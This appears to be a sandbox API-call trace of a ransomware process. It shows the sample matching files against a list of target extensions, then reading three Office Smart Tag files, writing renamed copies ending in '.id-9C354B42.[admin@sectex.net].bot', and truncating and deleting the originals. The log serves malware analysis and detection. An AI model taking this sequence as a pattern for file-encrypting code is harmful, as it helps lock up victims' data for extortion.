	[0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.117] lstrlenW (lpString=".doc") returned 4
	[0040.117] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.117] lstrlenW (lpString=".docx") returned 5
	[0040.117] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0040.117] lstrlenW (lpString=".pdf") returned 4
	[0040.117] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.117] lstrlenW (lpString=".xls") returned 4
	[0040.117] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.117] lstrlenW (lpString=".xlsx") returned 5
	[0040.117] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0040.117] lstrlenW (lpString=".ppt") returned 4
	[0040.117] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.117] lstrlenW (lpString=".zip") returned 4
	[0040.117] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.117] lstrlenW (lpString=".rar") returned 4
	[0040.117] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.117] lstrlenW (lpString=".bz2") returned 4
	[0040.117] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.117] lstrlenW (lpString=".7z") returned 3
	[0040.117] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.117] lstrlenW (lpString=".dbf") returned 4
	[0040.118] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.118] lstrlenW (lpString=".1cd") returned 4
	[0040.118] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.118] lstrlenW (lpString=".jpg") returned 4
	[0040.118] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.118] lstrlenW (lpString=".doc") returned 4
	[0040.118] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.118] lstrlenW (lpString=".docx") returned 5
	[0040.118] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0040.118] lstrlenW (lpString=".pdf") returned 4
	[0040.118] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.118] lstrlenW (lpString=".xls") returned 4
	[0040.118] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.118] lstrlenW (lpString=".xlsx") returned 5
	[0040.118] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0040.118] lstrlenW (lpString=".ppt") returned 4
	[0040.118] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.118] lstrlenW (lpString=".zip") returned 4
	[0040.118] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.118] lstrlenW (lpString=".rar") returned 4
	[0040.118] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.119] lstrlenW (lpString=".bz2") returned 4
	[0040.119] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.119] lstrlenW (lpString=".7z") returned 3
	[0040.119] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.119] lstrlenW (lpString=".dbf") returned 4
	[0040.119] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.119] lstrlenW (lpString=".1cd") returned 4
	[0040.119] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100
	[0040.119] lstrlenW (lpString=".jpg") returned 4
	[0040.119] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.119] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0040.119] lstrlenW (lpString="PHONE.XML") returned 9
	[0040.119] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0040.120] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1844) returned 1
	[0040.120] CloseHandle (hObject=0x184) returned 1
	[0040.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 0x20
	[0040.120] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0040.120] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.120] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4
	[0040.121] GetLastError () returned 0x0
	[0040.121] ReadFile (in: hFile=0x184, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x734, lpOverlapped=0x0) returned 1
	[0040.163] WriteFile (in: hFile=0x1a4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x740, lpOverlapped=0x0) returned 1
	[0040.164] ReadFile (in: hFile=0x184, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.164] WriteFile (in: hFile=0x1a4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0040.164] SetEndOfFile (hFile=0x1a4) returned 1
	[0040.165] CloseHandle (hObject=0x1a4) returned 1
	[0040.165] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.165] SetEndOfFile (hFile=0x184) returned 1
	[0040.166] CloseHandle (hObject=0x184) returned 1
	[0040.166] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.167] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 1
	[0040.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.167] lstrlenW (lpString=".doc") returned 4
	[0040.167] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.167] lstrlenW (lpString=".docx") returned 5
	[0040.167] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1
	[0040.167] lstrlenW (lpString=".pdf") returned 4
	[0040.167] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.167] lstrlenW (lpString=".xls") returned 4
	[0040.167] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.167] lstrlenW (lpString=".xlsx") returned 5
	[0040.167] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1
	[0040.167] lstrlenW (lpString=".ppt") returned 4
	[0040.167] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.167] lstrlenW (lpString=".zip") returned 4
	[0040.167] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.167] lstrlenW (lpString=".rar") returned 4
	[0040.167] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.167] lstrlenW (lpString=".bz2") returned 4
	[0040.167] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.167] lstrlenW (lpString=".7z") returned 3
	[0040.167] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.167] lstrlenW (lpString=".dbf") returned 4
	[0040.167] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.168] lstrlenW (lpString=".1cd") returned 4
	[0040.168] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.168] lstrlenW (lpString=".jpg") returned 4
	[0040.168] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.168] lstrlenW (lpString=".doc") returned 4
	[0040.168] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString=".docx") returned 5
	[0040.168] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1
	[0040.168] lstrlenW (lpString=".pdf") returned 4
	[0040.168] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString=".xls") returned 4
	[0040.168] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString=".xlsx") returned 5
	[0040.168] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1
	[0040.168] lstrlenW (lpString=".ppt") returned 4
	[0040.168] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.168] lstrlenW (lpString=".zip") returned 4
	[0040.168] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.168] lstrlenW (lpString=".rar") returned 4
	[0040.168] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString=".bz2") returned 4
	[0040.168] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString=".7z") returned 3
	[0040.168] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.168] lstrlenW (lpString=".dbf") returned 4
	[0040.168] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.168] lstrlenW (lpString=".1cd") returned 4
	[0040.168] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77
	[0040.169] lstrlenW (lpString=".jpg") returned 4
	[0040.169] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.169] lstrcmpiW (lpString1=".DAT", lpString2=".bot") returned 1
	[0040.169] lstrlenW (lpString="STOCKS.DAT") returned 10
	[0040.169] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0040.176] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=39017) returned 1
	[0040.176] CloseHandle (hObject=0x1f4) returned 1
	[0040.176] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 0x20
	[0040.176] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0040.176] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.177] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.177] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0040.177] GetLastError () returned 0x0
	[0040.177] ReadFile (in: hFile=0x1f4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x9869, lpOverlapped=0x0) returned 1
	[0040.179] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x9870, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x9870, lpOverlapped=0x0) returned 1
	[0040.181] ReadFile (in: hFile=0x1f4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.181] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0040.181] SetEndOfFile (hFile=0x1b0) returned 1
	[0040.181] CloseHandle (hObject=0x1b0) returned 1
	[0040.182] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.182] SetEndOfFile (hFile=0x1f4) returned 1
	[0040.183] CloseHandle (hObject=0x1f4) returned 1
	[0040.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.184] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 1
	[0040.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.184] lstrlenW (lpString=".doc") returned 4
	[0040.184] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1
	[0040.184] lstrlenW (lpString=".docx") returned 5
	[0040.184] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1
	[0040.184] lstrlenW (lpString=".pdf") returned 4
	[0040.184] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1
	[0040.184] lstrlenW (lpString=".xls") returned 4
	[0040.184] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1
	[0040.184] lstrlenW (lpString=".xlsx") returned 5
	[0040.184] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1
	[0040.184] lstrlenW (lpString=".ppt") returned 4
	[0040.184] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1
	[0040.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.184] lstrlenW (lpString=".zip") returned 4
	[0040.184] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1
	[0040.184] lstrlenW (lpString=".rar") returned 4
	[0040.184] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1
	[0040.184] lstrlenW (lpString=".bz2") returned 4
	[0040.184] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1
	[0040.184] lstrlenW (lpString=".7z") returned 3
	[0040.184] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1
	[0040.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.184] lstrlenW (lpString=".dbf") returned 4
	[0040.184] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1
	[0040.184] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.185] lstrlenW (lpString=".1cd") returned 4
	[0040.185] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1
	[0040.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.185] lstrlenW (lpString=".jpg") returned 4
	[0040.185] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1
	[0040.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.185] lstrlenW (lpString=".doc") returned 4
	[0040.185] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1
	[0040.185] lstrlenW (lpString=".docx") returned 5
	[0040.185] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1
	[0040.185] lstrlenW (lpString=".pdf") returned 4
	[0040.185] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1
	[0040.185] lstrlenW (lpString=".xls") returned 4
	[0040.185] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1
	[0040.185] lstrlenW (lpString=".xlsx") returned 5
	[0040.185] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1
	[0040.185] lstrlenW (lpString=".ppt") returned 4
	[0040.185] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1
	[0040.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.185] lstrlenW (lpString=".zip") returned 4
	[0040.185] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1
	[0040.185] lstrlenW (lpString=".rar") returned 4
	[0040.185] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1
	[0040.185] lstrlenW (lpString=".bz2") returned 4
	[0040.185] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1
	[0040.185] lstrlenW (lpString=".7z") returned 3
	[0040.185] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1
	[0040.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.185] lstrlenW (lpString=".dbf") returned 4
	[0040.185] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1
	[0040.185] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.185] lstrlenW (lpString=".1cd") returned 4
	[0040.186] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1
	[0040.186] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78
	[0040.186] lstrlenW (lpString=".jpg") returned 4
	[0040.186] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1
	[0040.186] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0040.186] lstrlenW (lpString="TIME.XML") returned 8
	[0040.186] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0040.186] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=8564) returned 1
	[0040.186] CloseHandle (hObject=0x1f4) returned 1
	[0040.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml")) returned 0x20
	[0040.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.187] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4
	[0040.187] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.187] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.187] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\TIME.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\time.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0040.187] GetLastError () returned 0x0
	[0040.187] ReadFile (in: hFile=0x1f4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x2174, lpOverlapped=0x0) returned 1
	[0040.189] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x2180, lpOverlapped=0x0) returned 1
	[0040.190] ReadFile (in: hFile=0x1f4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.190] WriteFile (in: hFile=0x1b0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0040.190] SetEndOfFile (hFile=0x1b0) returned 1
	[0040.190] CloseHandle (hObject=0x1b0) returned 1
